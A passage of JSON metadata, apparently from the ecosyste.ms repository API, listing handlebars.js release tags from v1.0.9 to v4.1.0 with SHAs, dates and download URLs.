js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@tmp-1252-backup","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url"